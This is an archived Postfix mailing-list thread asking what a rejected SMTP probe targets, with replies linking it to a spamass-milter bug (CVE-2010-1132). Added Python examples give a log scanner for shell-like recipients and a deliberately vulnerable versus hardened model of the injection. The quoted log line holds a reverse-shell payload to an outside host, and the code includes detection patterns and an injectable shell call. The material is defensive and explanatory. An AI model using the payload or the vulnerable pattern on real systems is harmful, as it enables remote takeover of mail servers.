What attack is this one?

Bob Proulx

Feb 12, 2011, 4:53:53 PM
A friend's Mac running Postfix logged this rejected attack:

Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>

Of course this particular message was blocked at the HELO stage. But
I was curious as to what attack vector this was trying to exploit and
against what mail transport agent? I searched the web quite a bit and
didn't see this particular attack discussed anywhere.

Obviously the /dev/tcp/host/port part is trying to connect back to a
C&C host and attach the network connection to a root shell. I
understand the shell scripting part of the attack fine.

The remote mta security exploit I couldn't locate references to was
the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
vulnerable to "+:|" in the To address? Or perhaps none are and this
is simply a failed probe attempt?

Thanks,
Bob
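
Added example (not part of the thread): a small Python scanner that pulls the envelope sender and recipient out of Postfix smtpd "NOQUEUE: reject: RCPT" lines of the shape quoted above and flags recipients that look like shell commands, extracting the call-back host and port from the /dev/tcp/ redirection. The log sample is constructed: its first line is the one from the post, the other two are made-up non-matches using RFC 5737 addresses. One caveat a practitioner should keep in mind: `|` and `/` are legal in an unquoted local-part (RFC 5321 atext), so the rules key on command structure (pipe to a shell, /dev/tcp/, descriptor redirections, command substitution), not on the bare characters.

```python
import re

# Constructed sample of Postfix smtpd log lines. The first is the rejection
# quoted in the post; the other two are made up (RFC 5737 addresses) so the
# scanner has something to ignore.
SAMPLE_LOG = """\
Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
Feb 11 21:46:02 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from mail.example.net[192.0.2.10]: 554 5.7.1 <nobody@example.org>: Relay access denied; from=<alice@example.net> to=<nobody@example.org> proto=ESMTP helo=<mail.example.net>
Feb 11 21:47:15 mailer postfix/smtpd[3711]: 7F3A2B1C0D: client=mail.example.net[192.0.2.10]
"""

# Field layout of a "NOQUEUE: reject: RCPT" line. The recipient can itself
# contain '>' (as in "1>&0" above), so it is delimited by the literal
# "> proto=" rather than by the first closing angle bracket.
RCPT_RE = re.compile(
    r"(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: RCPT from (?P<client>[^\[ ]+)\[(?P<ip>[^\]]+)\]: "
    r"(?P<reason>.*?); from=<(?P<from>.*?)> to=<(?P<to>.*?)> proto="
)

# Shapes a shell would act on. Bare '|' and '/' are legal atext in an
# RFC 5321 local-part, so the rules look for command structure, not characters.
INDICATORS = {
    "pipe_to_shell": re.compile(r"\|\s*(?:exec\s+)?(?:/\S*/)?(?:sh|bash|dash|ksh|zsh)\b"),
    "dev_tcp_callback": re.compile(r"/dev/tcp/([\w.:-]+)/(\d{1,5})"),
    "command_substitution": re.compile(r"\$\(|`"),
    "command_separator": re.compile(r";|&&|\|\|"),
    "fd_redirection": re.compile(r"\d?[<>]&\d"),
}


def analyse_recipient(rcpt):
    """Return (indicator names, (host, port) of a /dev/tcp call-back or None)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(rcpt)]
    callback = None
    m = INDICATORS["dev_tcp_callback"].search(rcpt)
    if m:
        callback = (m.group(1), int(m.group(2)))
    return hits, callback


def scan_log(text):
    """One finding per RCPT reject whose recipient looks like a shell command."""
    findings = []
    for line in text.splitlines():
        m = RCPT_RE.search(line)
        if not m:
            continue
        hits, callback = analyse_recipient(m.group("to"))
        if not hits:
            continue
        findings.append({
            "timestamp": m.group("ts"),
            "client_ip": m.group("ip"),
            # True when Postfix stopped the session before the RCPT was
            # handed to anything that could have interpreted it.
            "helo_rejected": "Helo command rejected" in m.group("reason"),
            "sender": m.group("from"),
            "recipient": m.group("to"),
            "indicators": hits,
            "callback": callback,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['client_ip']} -> {f['callback']} {f['indicators']}")
```

Run it over a real /var/log/mail.log and the call-back tuples are the thing to block or hunt for in netflow; the client_ip tells you which hosts are spraying the probe.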

Sahil Tandon

Feb 12, 2011, 5:03:33 PM

Bob Proulx

Feb 12, 2011, 5:41:18 PM
Sahil Tandon wrote:

> Bob Proulx wrote:
> > The remote mta security exploit I couldn't locate references to was
> > the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
> > vulnerable to "+:|" in the To address? Or perhaps none are and this
> > is simply a failed probe attempt?
>
> Likely related to CVE-2010-1132:
>
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1132
> http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html

Ah... Yes that does look like it.

Thanks!
Bob

Robert Schetterer

Feb 13, 2011, 3:45:52 AM
On 12.02.2011 22:53, Bob Proulx wrote:
> A friend's Mac running Postfix logged this rejected attack:
>
> Feb 11 21:45:28 mailer postfix/smtpd[3708]: NOQUEUE: reject: RCPT from unknown[216.104.47.74]: 504 5.5.2 <bluedick>: Helo command rejected: need fully-qualified hostname; from=<bl...@dick.com> to=<root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0> proto=SMTP helo=<bluedick>
>
> Of course this particular message was blocked at the HELO stage. But
> I was curious as to what attack vector this was trying to exploit and
> against what mail transport agent? I searched the web quite a bit and
> didn't see this particular attack discussed anywhere.
>
> Obviously the /dev/tcp/host/port part is trying to connect back to a
> C&C host and attach the network connection to a root shell. I
> understand the shell scripting part of the attack fine.
>
> The remote mta security exploit I couldn't locate references to was
> the "to=<root+:|exec /bin/sh ..." part of the attack. What mta is
> vulnerable to "+:|" in the To address? Or perhaps none are and this
> is simply a failed probe attempt?
>
> Thanks,
> Bob

Looks like it's trying an already fixed bug in spamass-milter:

http://savannah.nongnu.org/bugs/?29136

--
Best regards

Robert Schetterer

Germany/Munich/Bavaria
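
Added example (Python, not spamass-milter's code and not the fix from the bug tracker above) that models the bug class behind CVE-2010-1132 referenced in the two replies: a milter that expands recipients by running sendmail -bv <recipient> through a shell, so a recipient of the form `root+:|command` becomes a pipeline. It shows the vulnerable call beside the hardened one. Assumptions: `printf` stands in for sendmail so it runs without an MTA, a file-writing payload in a temp directory replaces the /dev/tcp call-back, and the addresses are constructed.

```python
import os
import re
import subprocess
import tempfile

# Assumption: a harmless stand-in for the `sendmail -bv <recipient>` call a
# milter might make to expand a recipient. The bug does not depend on the
# command; it depends on the recipient being handed to a shell.
STANDIN = ["printf", "%s\n"]

# Dot-atom form of a mailbox (RFC 5321 atext, optional domain). Note that
# '|', '/', '&' and '!' are legal here, so a character blacklist would break
# real addresses: the fix is to never let a shell see the recipient at all.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
ADDR_RE = re.compile(rf"^{ATEXT}(?:\.{ATEXT})*(?:@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*)?$")


def expand_vulnerable(rcpt):
    """Bug class of CVE-2010-1132: the recipient is spliced into a shell command.

    With rcpt = 'root+:|exec /bin/sh ...' the shell sees a pipeline, and the
    right-hand side runs as whatever user the milter runs as.
    """
    cmd = "printf '%s\\n' " + rcpt          # no quoting, modelling the original bug
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def expand_hardened(rcpt):
    """Validate the syntax, then pass the recipient as one argv element: no shell."""
    if not ADDR_RE.match(rcpt):
        raise ValueError("not a dot-atom mailbox: %r" % rcpt)
    return subprocess.run(STANDIN + [rcpt], capture_output=True, text=True,
                          check=True).stdout


def demo():
    """Run the probe shape from the log against both versions; report what happened."""
    with tempfile.TemporaryDirectory() as workdir:
        marker_v = os.path.join(workdir, "vulnerable")
        marker_h = os.path.join(workdir, "hardened")
        # Same shape as the probe in the log, but the payload only writes a file
        # in a temp directory instead of opening /dev/tcp to a remote host.
        probe_v = "root+:|echo injected > " + marker_v
        probe_h = "root+:|echo injected > " + marker_h

        expand_vulnerable(probe_v)
        try:
            expand_hardened(probe_h)
            hardened_rejected = False
        except ValueError:
            hardened_rejected = True

        # A legal address containing '|' (atext): the shell version turns it
        # into a pipeline and loses the output; the argv version keeps it intact.
        legit = "a|b@example.org"
        return {
            "vulnerable_executed_payload": os.path.exists(marker_v),
            "hardened_executed_payload": os.path.exists(marker_h),
            "hardened_rejected_payload": hardened_rejected,
            "hardened_preserves_legit": expand_hardened(legit) == legit + "\n",
            "vulnerable_mangles_legit": expand_vulnerable(legit) != legit + "\n",
        }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The second half of the demo is the part worth remembering: a character blacklist on the recipient would have rejected a legal `a|b@example.org`, while the argv form handles it correctly and still cannot be tricked into running anything, whatever the recipient contains.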
